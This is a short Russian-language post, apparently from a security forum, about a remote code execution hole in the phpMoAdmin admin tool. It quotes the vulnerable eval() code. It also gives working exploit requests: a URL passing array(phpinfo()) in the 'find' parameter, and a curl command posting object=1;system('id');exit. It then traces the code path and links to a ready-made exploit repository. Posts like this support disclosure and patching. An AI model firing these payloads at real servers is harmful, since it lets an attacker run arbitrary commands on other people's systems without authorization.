RCE. Новость тут.
Видео https://vimeo.com/121072742
PHP код:
$find = array();
if (isset($_GET['find']) && $_GET['find']) {
    $_GET['find'] = trim($_GET['find']);
    if (strpos($_GET['find'], 'array') === 0) {
        // необработанный $_GET['find'] конкатенируется в eval() — это и есть источник RCE;
        // проверка strpos() лишь требует, чтобы строка начиналась с 'array'
        eval('$find = ' . $_GET['find'] . ';');
    } else if (is_string($_GET['find'])) {
        if ($findArr = json_decode($_GET['find'], true)) {
            $find = $findArr;
        }
    }
}
PHP код:
http://localhost/moadmin.php?action=listRows&find=array(phpinfo())&collection=123
UP: на секлисте запостили другой способ
Код:
curl "http://path.to/moadmin.php"; -d "object=1;system('id');exit"
PHP код:
Filename: moadmin.php
1. create new moadminComponent object
1977: $mo = new moadminComponent;
2. if the http-post parameter 'object' is set
738: class moadminComponent {
...
762: public function __construct() {
...
786: if (isset($_POST['object'])) {
787: if (self::$model->saveObject($_GET['collection'],
         $_POST['object'])) {
...
3. evaluate the value of 'object' as PHP code
692: public function saveObject($collection, $obj) {
693: eval('$obj=' . $obj . ';'); //cast from string to array
Готовый сплой: https://github.com/XiphosResearch/exploits/tree/master/phpMoAdmin